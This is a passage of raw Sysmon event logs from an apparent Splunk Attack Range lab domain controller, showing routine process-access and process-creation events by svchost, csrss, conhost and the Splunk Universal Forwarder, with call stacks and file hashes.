\ntdll.dll+51821 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-647E-6064-3B00-00000000AE01}37363756C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.143{266CAFBE-647E-6064-3A00-00000000AE01}37283732C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.134{266CAFBE-647E-6064-3C00-00000000AE01}3772C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.112{266CAFBE-647E-6064-3B00-00000000AE01}37363756C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.096{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.080{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.080{266CAFBE-647D-6064-2F00-00000000AE01}27962808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.079{266CAFBE-647E-6064-3A00-00000000AE01}3728C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
